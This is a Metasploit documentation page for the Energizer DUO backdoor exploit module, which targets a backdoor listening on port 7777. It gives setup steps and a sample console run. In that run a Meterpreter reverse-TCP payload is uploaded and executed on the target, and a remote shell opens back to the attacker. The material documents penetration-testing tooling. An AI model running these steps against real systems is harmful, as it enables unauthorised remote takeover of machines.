adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md
T
Brent Cook 8489bcdfd9 This fixes broken links to the community.rapid7.com blog 
Performed mechanically with sed, spot-checked that the new blog can consume these links.
2020-02-18 09:06:11 -06:00

1.3 KiB
Raw Blame History

Vulnerable Application

More information can be found on the Rapid7 Blog. Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

The software can be downloaded from the Wayback Machine.

Verification Steps

  1. Install the vulnerable software
  2. Start msfconsole
  3. Do: use exploit/windows/backdoor/energizer_duo_payload
  4. Do: set rhost
  5. Do: set payload
  6. Do: exploit

Scenarios

A run against the backdoor

  msf > use exploit/windows/backdoor/energizer_duo_payload
  msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
  msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
  msf exploit(energizer_duo_payload) > exploit
  
  [*] Started reverse handler on 192.168.0.228:4444
  [*] Trying to upload C:\NTL0ZTL4DhVL.exe...
  [*] Trying to execute C:\NTL0ZTL4DhVL.exe...
  [*] Sending stage (747008 bytes)
  [*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
  
  meterpreter > getuid
  Server username: XPDEV\Developer
Reference in New Issue View Git Blame Copy Permalink